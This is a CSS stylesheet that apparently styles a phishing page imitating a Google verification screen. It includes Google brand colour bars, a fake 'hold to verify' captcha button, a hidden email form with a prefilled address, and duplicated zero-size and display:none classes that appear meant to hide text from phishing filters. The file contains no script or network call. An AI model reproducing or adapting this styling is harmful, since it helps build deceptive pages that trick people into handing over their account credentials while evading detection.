#loader-container {
  position: fixed;
  width: 100vw;
  height: 100vh;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  background: linear-gradient(120deg, #89f7fe, #66a6ff);
  z-index: 10;
}

.loader-circle {
  border: 6px solid rgba(255, 255, 255, 0.3);
  border-top: 6px solid white;
  border-radius: 50%;
  width: 80px;
  height: 80px;
  animation: spin 1s linear infinite;
}


        .Overlay {
      display: flex;
      position: fixed;
      justify-content: center;
      align-items: flex-end;
      top: 0;
      right: 0;
      left: 0;
      bottom: 0;
      padding: 16px 12px;
      background-color: rgba(246, 246, 246, 0.6);
      z-index: 50000;
    }

    .Ih3FE {
      transform: translateZ(0);
      z-index: 50001;
    }

    .z {
 font-size:0px;
 display:inline;
}

.hdnnnn{

display:none;

}

.z {
 font-size:0px;
 display:inline;
}

.hdnnnn{

display:none;

}


@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

body {
  font-family: 'Roboto', sans-serif;
  background: #F5F5F5;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
  margin: 0;
}

.container {
  background: white;
  padding: 25px;
  border-radius: 8px;
  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
  text-align: center;
  max-width: 370px;
  width: 90%;
  border-top: 4px solid #4285F4;
  display: none;
}

.logo {
  width: 120px;
  margin-bottom: 15px;
}

h1 {
  font-size: 20px;
  color: #3c4043;
  margin-bottom: 15px;
  font-weight: 500;
}

p {
  font-size: 14px;
  color: #5f6368;
  margin-bottom: 20px;
  line-height: 1.5;
}

.bold-text {
  font-weight: 500;
  color: #3c4043;
}

input {
  width: 100%;
  max-width: 300px;
  padding: 12px;
  border: 1px solid #dadce0;
  border-radius: 4px;
  font-size: 14px;
  margin-bottom: 15px;
  box-sizing: border-box;
  text-align: center;
  transition: border 0.3s;
}

input:focus {
  border-color: #4285F4;
  outline: none;
}

button {
  width: auto;
  padding: 10px 24px;
  background: #4285F4;
  color: white;
  border: none;
  border-radius: 4px;
  font-size: 14px;
  font-weight: 500;
  cursor: pointer;
  transition: background 0.3s;
  margin-top: 10px;
}

button:hover {
  background: #3367D6;
}

.verification-text {
  font-size: 13px;
  color: #5f6368;
  margin-top: 15px;
  display: block;
}

.loading-spinner {
  border: 4px solid rgba(66, 133, 244, 0.1);
  border-top: 4px solid #4285F4;
  border-radius: 50%;
  width: 30px;
  height: 30px;
  animation: spin 1s linear infinite;
  display: none;
  margin: 15px auto;
}

.google-colors {
  display: flex;
  justify-content: center;
  margin-bottom: 20px;
}

.color-bar {
  height: 4px;
  width: 25%;
}

.blue { background-color: #4285F4; }
.red { background-color: #EA4335; }
.yellow { background-color: #FBBC05; }
.green { background-color: #34A853; }

.captcha-container {
  margin: 20px 0;
  padding: 15px;
  background: #f8f9fa;
  border-radius: 4px;
  border: 1px solid #dadce0;
  text-align: center;
}

.hold-button {
  width: 100%;
  padding: 15px;
  background: #f1f3f4;
  border: 2px solid #dadce0;
  border-radius: 4px;
  font-size: 16px;
  font-weight: 500;
  color: #3c4043;
  cursor: pointer;
  position: relative;
  overflow: hidden;
  transition: background 0.3s;
}

.hold-button:hover {
  background: #e8eaed;
}

.hold-button.active {
  background: #e6f4ea;
  border-color: #34a853;
}

.hold-button.success {
  background: #e6f4ea;
  border-color: #34a853;
  color: #34a853;
}

.progress-bar {
  position: absolute;
  bottom: 0;
  left: 0;
  height: 4px;
  background: #34a853;
  width: 0%;
  transition: width 0.1s linear;
}

.instructions {
  font-size: 13px;
  color: #5f6368;
  margin-top: 10px;
}

#email-form {
  display: none;
}

.prefilled-email {
  font-weight: bold;
  color: #4285F4;
  margin: 15px 0;
}

@media (max-width: 768px) {
  #main-content {
    width: 80%;
  }
}
